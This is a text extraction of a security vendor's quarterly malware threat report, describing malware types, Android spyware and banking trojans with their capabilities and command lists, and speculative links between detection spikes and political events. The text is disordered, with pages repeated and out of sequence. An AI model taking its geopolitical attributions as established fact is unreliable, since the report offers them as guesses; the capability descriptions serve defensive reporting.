The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
